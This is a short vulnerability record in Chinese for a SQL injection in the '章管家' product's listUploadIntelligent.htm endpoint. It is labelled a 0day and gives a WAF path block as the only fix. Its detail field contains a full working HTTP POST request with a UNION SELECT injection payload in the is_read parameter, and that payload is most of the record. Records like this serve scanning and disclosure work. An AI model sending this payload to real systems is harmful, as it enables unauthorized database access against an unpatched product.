vendor = "章管家"
name = "章管家 listUploadIntelligent.htm SQL 注入漏洞"
type = "SQL注入"
version = "未知"
path = "/app/message/listUploadIntelligent.htm?token=dingtalk_token"
detail = "POST /app/message/listUploadIntelligent.htm?token=dingtalk_token HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Content-Type: application/x-www-form-urlencoded person_id=1&unit_id=1&pageNo=1&is_read=-1 union select md5(1),2,3,4,5,6,7,8,9,10,11,12 --"
fix = "WAF封禁路路径，等待发布补丁"
date = "0816"
label = "0day"
